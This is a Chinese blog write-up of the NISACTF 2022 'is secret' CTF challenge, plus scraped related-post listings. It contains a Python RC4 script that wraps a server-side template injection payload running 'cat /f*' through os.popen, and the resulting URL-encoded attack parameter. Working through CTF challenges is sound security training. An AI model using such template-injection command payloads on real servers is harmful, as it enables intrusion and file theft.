每日练习-[NISACTF 2022]is secret

最新推荐文章于 2024-11-04 13:46:15 发布
最新推荐文章于 2024-11-04 13:46:15 发布
阅读量249 收藏
点赞数
文章标签: 服务器 前端 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68113265/article/details/132406488
版权
本文讲述了如何利用rc4加密技术与SSTI(服务器端模板注入)相结合,通过给定密钥对参数进行解密并实现恶意注入攻击的过程,展示了攻击者如何构造payload利用这些技术进行操作。
摘要由CSDN通过智能技术生成
ssti和rc4加密结合

dir扫出secret页面. 

 随便传参内容,报错页面找到可疑代码

 给了密钥HereIsTreasure以及是rc4加密对传参内容进行解密,同时为ssti注入.

找了师傅们的rc4加密脚本

import base64
from urllib.parse import quote
def rc4_main(key = "init_key", message = "init_message"):
    # print("RC4加密主函数")
    s_box = rc4_init_sbox(key)
    crypt = str(rc4_excrypt(message, s_box))
    return  crypt
def rc4_init_sbox(key):
    s_box = list(range(256))
    # print("原来的 s 盒:%s" % s_box)
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    # print("混乱后的 s 盒:%s"% s_box)
    return s_box
def rc4_excrypt(plain, box):
    # print("调用加密程序成功。")
    res = []
    i = j = 0
    for s in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(ord(s) ^ k))
    cipher = "".join(res)
    print("加密后的字符串是:%s" %quote(cipher))
    return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
rc4_main("HereIsTreasure","{{lipsum.__globals__.os.popen('cat /f*').read()}}")

 payload:

?secret=.%14U%5C%C2%BA%14%1Ec%25%C2%A2%C3%A7%14%C2%B2%C2%BD%C3%B4%C2%A98%C2%80k%0B%C3%B9%5D%C3%B3%3C%1A%C2%9E%28%C2%8C%5C%C2%84u%C3%A4%2C%C2%9F%0D%C2%99%0E%C2%BBo%C2%AD5%C3%88%C2%88%C3%A3iF%C3%B4%07%C2%B8

He@11
关注
[NISACTF 2022]下
qq_62046696的博客
07-30 2744
打开界面看见这种,格式一般都是利用管道符然后进行堆叠注入或者报错注入试一下堆叠注入试了一下被过滤掉了,那就是报错注入喽or被过滤用||代替=被过滤用like代替database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名column被过滤,用无列名注入输出长度限制,mid函数,substr函数t因为as被过滤所以不能使用,database因为aa是错误的表名,sqlsql就是正确的表名,通过报错。...
[NISACTF 2022]上
qq_62046696的博客
07-26 4419
在php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
每日一博 - App key和App Secret
小工匠
12-18 5109
App Key和App Secret是API接口调用中常用的身份验证机制,确保只有合法的应用程序可以访问API。
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
[NISACTF 2022]WriteUp web篇
Pysnow's Blog
04-01 5089
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
NISACTF2022公开通道
as you know, nlp is fantasitc!
03-29 6249
NISACTF2022公开通道checkinlevel_up第一层 robots.txt第二层 md5碰撞第三层 sha1碰撞第四层 parse_url解析漏洞第五层create_function()注入bingdundunbabyserializebabyuploadeasyssrfis secret(原题)popchain(原题)middlevel(原题) 题目 checkin urlencode,因为解释器读取出来的才是真正的顺序 ahahahaha=jitanglailo&&%E2%
py逆向-NSSCTF-[NISACTF 2022]ezpython
m0_73393932的博客
04-14 1499
逆向
容器编排技术 -- Kubernetes kubectl create secret 命令详解
YunWisdom
08-28 4044
容器编排技术 -- Kubernetes kubectl create secret 命令详解 1kubectl create secret 2语法 3参考: kubectl create secret 使用指定的子命令创建secret。 语法 $ secret 参考: create docker-registry 命令 create secret generic...
容器编排技术 -- Kubernetes kubectl create secret docker-registry 命令详解
YunWisdom
08-28 3259
容器编排技术 -- Kubernetes kubectl create secret docker-registry 命令详解 1kubectl create secret docker-registry 2语法 3示例 4Flags kubectl create secret docker-registry 创建与Docker registries一起使用的secret。...
Kubernetes-主要概念-Secret
了解➔熟悉➔掌握➔精通
03-23 3万+
分享一个大牛的人工智能教程。零基础!通俗易懂!风趣幽默!希望你也加入到人工智能的队伍中来!请点击http://www.captainbed.net Secret解决了密码、token、密钥等敏感数据的配置问题,而不需要把这些敏感数据暴露到镜像或者Pod Spec中。Secret可以以Volume或者环境变量的方式使用。 Secret类型 Secret有三种类型: Service Account:用来访问Kubernetes API,由Kubernetes自动创建,并且会自动挂载到Pod的
git-secret组件的安装及使用(一篇精通)
Null的博客
03-28 3569
一、什么是git-secret git-secret是用来加密git项目中的文件,防止git项目传入到万维网上出现泄密的情况。 git-secret采用gpg加密的方式,所以需要gpg的技术,本文会详细介绍及安装使用。 二、什么是gpg 1991年,程序员Phil Zimmermann为了避开政府监视,开发了加密软件PGP。这个软件非常好用,迅速流传开来,成了许多程序员的必备工具。但是,它...
文件预览-使用SecretID和SecretKey进行腾讯云cos桶文件预览(word、ppt等)
work_harder999的博客
04-19 3万+
博主需要完成一个文件预览的功能,没想到React没有插件,可能是PPT、Word的版权问题,pdf就有viewer之类的包。也试了一下微软的,不太好用,很久没维护了,因此选择了腾讯云的存储桶,可以白嫖一波,50GB 6个月。 # 使用前的准备...
块存储的应用、libvirt secret、KVM虚拟机、配置对象存储
BELONE
10-27 2608
注:此篇文章,如有疑惑,请参考上一篇【CEPH集群 分布式存储服务】。 一、块存储应用 1.1 Ceph认证账户 Ceph默认开启用户认证,客户端需要账户才可以访问 — 默认账户名称为client.admin ,key是账户的密钥 — 可以使用ceph auth 添加新账户(实验中使用默认账户) node: # cat /etc/ceph/ceph.conf //配置文件 [global...
CSDN 2021-2022年微博情感数据分析
Mr数据杨
12-31 7496
新年第一篇,承蒙邹总邀请CSDN 上已经有很多关于爬虫* 的博客和代码,还有很多关于 情感分析 的研究和实战例子,既然大家对这个技术都这么感兴趣,我们就来一个真实的例子,看看大家在解决实际问题的能力如何。CSDN 的很多用户都在各个微信群、社区里面表达过对 CSDN 的各种反馈,这些人和众多普通用户相比,还是很少的一部分,那么,我们怎样收集到散落在网上的各种反馈和评论,并做定性、定量的分析呢?这就需要数据挖掘、自然语言处理、情感分析、和数据可视化的技巧了。
服务器作业3
2201_75343695的博客
11-04 173
zone “61.168.192.in-addr.arpa” IN { //网络位地址倒序表示。//正向解析的资源记录文件(数据文件)zone “openlab.com” IN { //正向解析域。
Linux/Unix echo命令
Oo_Amy_oO的博客
11-04 815
echo是 Linux 和 Unix 系统中一个非常基本且常用的命令行工具,用于在终端或文件中显示文本。以下是一些echo在终端显示 “Hello, World!echo $PATH显示环境变量PATH的值。将 “New content” 写入file.txt,如果文件不存在则创建它。将 “Additional content” 追加到file.txt文件的末尾。使用-e选项来解释转义序列(如\n表示换行)。使用-n选项来防止echo命令在输出后添加换行符。echo $?显示上一个命令的退出状态。$(
服务器内存不够导致postgresql进程被kill的问题记录
工具人的博客
11-04 172
服务器环境:Centos7.9,PGSQL14。
服务器作业(2)
最新发布
2201_75403777的博客
11-04 328
3、将/home/tom目录仅共享给192.168.xxx.xxx这台主机,并只有用户tom对该目录有读写权限。2、开放/nfs/upload目录,为192.168.xxx.0/24网段主机可以上传目录,并将所有用户及所属的组映射为nfs-upload,其UID和GID均为210。1、开放/nfs/shared目录,供所有用户查询资料。创建用户nfs-upload。服务端开启对其他用户的写权限。挂载/nfs/shared。挂载/nfs/upload。要发别创建挂载目录的目录。挂载/home/tom。
浅谈串口服务器的作用
a876106354的博客
11-01 287
通过将串行通信转换为以太网通信,串口服务器使得远程访问串行设备成为可能,这对于远程监控和控制非常有用。:串口服务器可以扩展网络,使得原本只能通过短距离串行通信连接的设备能够通过长距离的网络连接。:它可以帮助将传统的串行设备集成到现代的网络环境中,使得这些设备能够与网络中的其他设备通信。:在工业自动化和物联网(IoT)领域,串口服务器可以用于收集来自传感器和其他串行设备的数据。:串口服务器可以提供网络级别的安全措施,如VPN、防火墙和加密,以保护数据传输的安全。
service password-encryption,enable secret,enable password区别
06-06
这三个命令都是用于保护Cisco设备的访问密码,但是它们的作用略有不同。 - `service password-encryption`命令用于将所有明文密码加密,以保护它们不被轻易地窃取。它将明文密码转换为加密字符串,但是并不提供真正的安全保障,因为这些加密字符串可以被轻松地破解。 - `enable password`命令用于设置特权模式下的访问密码。特权模式是Cisco设备上的最高级别权限,它允许用户执行所有配置和管理操作。如果没有设置enable password,任何人都可以通过特权模式访问设备并更改其配置。 - `enable secret`命令与enable password类似,但是它提供了更高的安全性。它使用MD5哈希算法对密码进行加密,并且可以设置更长的密码。建议使用enable secret命令而不是enable password命令来设置特权模式下的访问密码。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值